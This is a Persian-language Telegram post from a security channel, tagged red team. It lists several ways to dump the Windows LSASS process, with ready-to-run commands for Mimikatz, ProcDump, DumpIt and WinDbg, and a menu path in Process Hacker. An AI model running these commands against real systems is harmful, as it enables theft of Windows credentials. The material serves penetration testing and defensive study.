TGViewer
P.F.K Security P.F.K Security @pfksecurity · 2.1K subscribers
Post #290 520
احتمالاً بسیاری از شما راه های مختلفی برای dump پروسس Lsass در ویندوز می دانید. ممکن است کسی بیش از پنج راه را بداند، اما باور کنید راه های بسیار بیشتری وجود دارد.

#0x01 > Mimikatz

Methods: Sekurlsa::logonpasswords Sekurlsa::minidump lsadump::dcsync

#0x02 > ProcDump

Methods: procdump -ma lsass.exe lsass.dmp procdump -accepteula -64 -ma lsass.exe lsass.dmp

#0x03 > Process Hacker

Methods: System->LSASS process->Create Dump

#0x04 > DumpIt

Methods: tasklist /FI “IMAGENAME eq lsass.exe” DumpIt.exe PID output_file_name.bin

#0x05 > Windows Debugging Tools

Methods: windbg -p .dump /ma c:\path\to\lsass.dmp .detach .q

ادامه دارد ...
#Lsass #redteam
@PfkSecurity
  • 👍 1
More from @pfksecurity
  1. Oct 10, 2026⭕ یک خط برای پیدا کردن فایل‌ ها subfinder -d domain.com -silent | \ while read host; do \…
  2. Oct 10, 2026برای پیدا کردن یک Vulnerability، چقدر باید از داخل نرم‌ افزار بدونی؟ فرض کن قراره یک نرم‌…
  3. Oct 4, 2026📌 اVulnerability Research با Penetration Testing یکی نیست. این دو تا خیلی جاها کنار هم اس…
  4. Oct 2, 2026ویندوز و مک بدون اجازه‌ ت کلی داده ازت جمع میکنن لینوکس این کار رو نمیکنه (یا حداقل کنترلش…
  5. Sep 28, 2026CVE یعنی چی؟ احتمالاً وقتی درباره یک آسیب‌ پذیری میخونی، اولین چیزی که میبینی یک شماره شبی…
  6. Sep 27, 2026ویندوز از هر عکسی که تا حالا پاک کردی، یه تصویر کوچک (thumbnail) نگه میداره. این تصاویر دا…
Threads Profile ViewerView any public Threads profile without an account.Open ThreadLook →Writing with AI? Make it sound human.Metric37 rewrites AI drafts so they read naturally. Free AI detector, 1,500 words free.Try Metric37 →